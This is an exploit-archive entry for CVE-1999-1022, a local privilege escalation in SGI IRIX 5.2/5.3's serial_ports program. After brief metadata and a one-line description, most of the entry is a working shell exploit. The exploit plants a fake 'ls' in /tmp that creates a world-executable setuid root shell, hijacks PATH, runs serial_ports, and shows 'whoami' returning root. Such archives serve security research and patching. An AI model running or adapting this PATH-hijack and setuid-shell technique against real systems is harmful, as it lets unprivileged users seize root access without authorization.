SGI IRIX 5.2/5.3 - 'serial_ports' Local Privilege Escalation

Author: transit
type: local
platform: irix
port: 
date_added: 1994-02-02  
date_updated: 2012-06-22  
verified: 1  
codes: CVE-1999-1022;OSVDB-17058  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 19351.sh  

source: https://www.securityfocus.com/bid/464/info


A race condition exists in the serial_ports administrative program, as included by SGI in the 5.x Irix operating system. This race condition allows regular users to execute arbitrary commands as root.


cat > /tmp/ls
#!/bin/sh
cp /bin/sh /tmp/foo
chmod 4777 /tmp/foo
^D
chmod 755 /tmp/ls
cd /tmp
set PATH=( . $PATH )
/usr/lib/vadmin/serial_ports
# wait about 10-20 seconds and hit ^C, or wait for it to
# die out completely
/tmp/foo
# whoami
root